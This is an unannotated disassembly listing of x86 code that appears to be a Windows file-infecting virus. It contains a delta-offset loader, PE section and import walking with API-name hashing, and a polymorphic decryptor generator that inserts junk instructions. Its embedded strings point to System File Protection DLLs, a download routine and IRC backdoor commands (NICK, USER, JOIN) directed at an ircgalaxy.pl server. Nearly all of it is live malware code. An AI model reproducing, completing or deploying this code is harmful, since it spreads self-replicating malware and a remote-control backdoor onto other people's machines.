db 8Dh ;
db 95h ; •
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ; „
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 55500000h, 70D08F72h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 73736D62h
dd 74706F70h, 4553550Ah, 4A712052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
dd 7F95D1CAh, 10A61429h, 3AAB5957h, 27B1FAE5h, 10A61413h
dd 38D82DBDh, 19h dup(0)
; =============== S U B R O U T I N E =======================================
sub_433414 proc near ; CODE XREF: sub_4334CA:loc_4334B8�p
; sub_43351B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_433430: ; CODE XREF: sub_433414+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_433452
cmp eax, [edx+8]
jnb short loc_433452
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_433457
; ---------------------------------------------------------------------------
loc_433452: ; CODE XREF: sub_433414+23�j
; sub_433414+28�j
add edx, 28h
loop loc_433430
loc_433457: ; CODE XREF: sub_433414+3C�j
popa
retn 4
sub_433414 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_4334CA
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_433472: ; CODE XREF: .rsrc:00433479�j
cmp [eax], ebx
jz short loc_433482
add eax, 4
loop loc_433472
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_433482: ; CODE XREF: .rsrc:00433474�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_43349C
loc_43348C: ; CODE XREF: .rsrc:00433494�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_43348C
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_4334CA
loc_43349C: ; CODE XREF: .rsrc:0043348A�j
; sub_4334CA+34�j
cmp dword ptr [edx], 0
jz short loc_4334A6
sub esi, [edx]
add esi, [edx+10h]
loc_4334A6: ; CODE XREF: sub_4334CA-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_4334B5
push dword ptr [edx]
jmp short loc_4334B8
; ---------------------------------------------------------------------------
loc_4334B5: ; CODE XREF: sub_4334CA-1B�j
push dword ptr [edx+10h]
loc_4334B8: ; CODE XREF: sub_4334CA-17�j
call sub_433414
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_4334CA
; =============== S U B R O U T I N E =======================================
sub_4334CA proc near ; CODE XREF: .rsrc:00433461�p
; FUNCTION CHUNK AT 0043349C SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_43351B
mov eax, [ebp+1042D0h]
call near ptr dword_432B50+43h
call sub_433507
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_433500
mov [ebp+102410h], ebx
jmp short loc_43349C
; ---------------------------------------------------------------------------
loc_433500: ; CODE XREF: sub_4334CA+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_4334CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_433507 proc near ; CODE XREF: sub_4334CA+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_43351B
xor ecx, ecx
retn
sub_433507 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43351B proc near ; CODE XREF: sub_4334CA+10�p
; sub_433507+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_433414
add edx, [ebp+1042F8h]
add edx, esi
loc_43352F: ; CODE XREF: sub_43351B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_433640
cmp dword ptr [edx+10h], 0
jz locret_433640
mov eax, [edx+0Ch]
push eax
call sub_433414
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_433555: ; CODE XREF: sub_43351B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_433575
cmp cl, 2Eh
jz short loc_433564
loc_433561: ; CODE XREF: sub_43351B+58�j
inc eax
jmp short loc_433555
; ---------------------------------------------------------------------------
loc_433564: ; CODE XREF: sub_43351B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_433561
loc_433575: ; CODE XREF: sub_43351B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_433638
cmp word ptr [eax-2], 3233h
jnz loc_433638
push esi
cmp dword ptr [edx], 0
jnz short loc_433598
mov ecx, [edx+10h]
jmp short loc_43359A
; ---------------------------------------------------------------------------
loc_433598: ; CODE XREF: sub_43351B+76�j
mov ecx, [edx]
loc_43359A: ; CODE XREF: sub_43351B+7B�j
add esi, ecx
push ecx
call sub_433414
add esi, [ebp+1042F8h]
loc_4335A8: ; CODE XREF: sub_43351B+90�j
; sub_43351B+117�j
lodsd
test eax, eax
js short loc_4335A8
jz loc_433637
push dword ptr [ebp+1042F8h]
push eax
call sub_433414
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_4335D4: ; CODE XREF: sub_43351B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_4335EB
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_4335D4
; ---------------------------------------------------------------------------
loc_4335EB: ; CODE XREF: sub_43351B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_433631
cmp ebx, 0DB6E45A8h
jz short loc_433631
cmp ebx, 0FFA13B59h
jz short loc_433631
cmp ebx, 0ACB522D6h
jz short loc_433631
cmp ebx, 0F358E993h
jz short loc_433631
cmp ebx, 0F358E97Dh
jz short loc_433631
cmp ebx, 0E1253F46h
jz short loc_433631
cmp ebx, 0E1253F30h
jz short loc_433631
call dword ptr [ebp+1042D4h]
loc_433631: ; CODE XREF: sub_43351B+D6�j
; sub_43351B+DE�j ...
pop ebx
jmp loc_4335A8
; ---------------------------------------------------------------------------
loc_433637: ; CODE XREF: sub_43351B+92�j
pop esi
loc_433638: ; CODE XREF: sub_43351B+60�j
; sub_43351B+6C�j
add edx, 14h
jmp loc_43352F
; ---------------------------------------------------------------------------
locret_433640: ; CODE XREF: sub_43351B+18�j
; sub_43351B+22�j
retn
sub_43351B endp
; ---------------------------------------------------------------------------
db 3, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_4336D6
or ax, 2589h
jmp short loc_4336E9
; ---------------------------------------------------------------------------
loc_4336D6: ; CODE XREF: .rsrc:004336CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_4336E5
or ax, 2531h
jmp short loc_4336E9
; ---------------------------------------------------------------------------
loc_4336E5: ; CODE XREF: .rsrc:004336DD�j
or ax, 2501h
loc_4336E9: ; CODE XREF: .rsrc:004336D4�j
; .rsrc:004336E3�j
stosw
call near ptr dword_433644+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_4336FB proc near ; CODE XREF: .rsrc:00433D47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_433644+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_433723
rdtsc
jmp short loc_433725
; ---------------------------------------------------------------------------
loc_433723: ; CODE XREF: sub_4336FB+22�j
sub eax, eax
loc_433725: ; CODE XREF: sub_4336FB+26�j
stosd
retn
sub_4336FB endp
; =============== S U B R O U T I N E =======================================
sub_433727 proc near ; CODE XREF: .rsrc:loc_433D51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_43375A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_43376C
; ---------------------------------------------------------------------------
loc_43375A: ; CODE XREF: sub_433727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_43376C: ; CODE XREF: sub_433727+31�j
retn
sub_433727 endp
; =============== S U B R O U T I N E =======================================
sub_43376D proc near ; CODE XREF: sub_4337DF:loc_433806�p
; sub_4337DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_43379B
; ---------------------------------------------------------------------------
loc_433776: ; CODE XREF: sub_43376D+44�j
mov al, 0FCh
jmp short loc_43379A
; ---------------------------------------------------------------------------
loc_43377A: ; CODE XREF: sub_43376D+48�j
mov ax, 0EBh
stosw
jmp short loc_43379B
; ---------------------------------------------------------------------------
loc_433782: ; CODE XREF: sub_43376D+4C�j
push 4
pop eax
call near ptr dword_432B50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_43379B
; ---------------------------------------------------------------------------
loc_433798: ; CODE XREF: sub_43376D+50�j
mov al, 90h
loc_43379A: ; CODE XREF: sub_43376D+B�j
; sub_43376D+60�j ...
stosb
loc_43379B: ; CODE XREF: sub_43376D+7�j
; sub_43376D+13�j ...
push 15h
pop eax
call near ptr dword_432B50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_4337DE
test dl, dl
jz short loc_433776
dec dl
jz short loc_43377A
dec dl
jz short loc_433782
dec dl
jz short loc_433798
dec dl
jz short loc_4337CF
dec dl
jz short loc_4337D6
dec dl
jz short loc_4337DA
mov al, 0F9h
jmp short loc_43379A
; ---------------------------------------------------------------------------
loc_4337CF: ; CODE XREF: sub_43376D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_43379A
; ---------------------------------------------------------------------------
loc_4337D6: ; CODE XREF: sub_43376D+58�j
mov al, 0F5h
jmp short loc_43379A
; ---------------------------------------------------------------------------
loc_4337DA: ; CODE XREF: sub_43376D+5C�j
mov al, 0F8h
jmp short loc_43379A
; ---------------------------------------------------------------------------
locret_4337DE: ; CODE XREF: sub_43376D+40�j
retn
sub_43376D endp
; =============== S U B R O U T I N E =======================================
sub_4337DF proc near ; CODE XREF: .rsrc:loc_433C28�p
; .rsrc:00433DDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_4337EF
add al, 4
loc_4337EF: ; CODE XREF: sub_4337DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_433806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_433806: ; CODE XREF: sub_4337DF+1E�j
call sub_43376D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_43381D
mov ah, 29h
loc_43381D: ; CODE XREF: sub_4337DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_43376D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_433840
mov al, 86h
loc_433840: ; CODE XREF: sub_4337DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_433854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_433854: ; CODE XREF: sub_4337DF+6C�j
retn
sub_4337DF endp
; ---------------------------------------------------------------------------
loc_433855: ; CODE XREF: sub_43445B+183�p
lea edi, [ebp+1039CCh]
call sub_43376D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_43386F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_43386F db 0F7h ; ÷ ; CODE XREF: .rsrc:0043386A�j
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_433B00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_433B00: ; CODE XREF: .rsrc:00433AF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_433B17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_433B54
; ---------------------------------------------------------------------------
loc_433B17: ; CODE XREF: .rsrc:00433B0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_433B29
mov al, 29h
loc_433B29: ; CODE XREF: .rsrc:00433B25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_433B4C
mov ah, 0C8h
loc_433B4C: ; CODE XREF: .rsrc:00433B48�j
or ah, [ebp+1039B9h]
stosw
loc_433B54: ; CODE XREF: .rsrc:00433B15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_433BDD
call sub_43376D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_433B88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_433BD5
; ---------------------------------------------------------------------------
loc_433B88: ; CODE XREF: .rsrc:00433B7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_433BA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_433BBA
; ---------------------------------------------------------------------------
loc_433BA5: ; CODE XREF: .rsrc:00433B92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_433BBA: ; CODE XREF: .rsrc:00433BA3�j
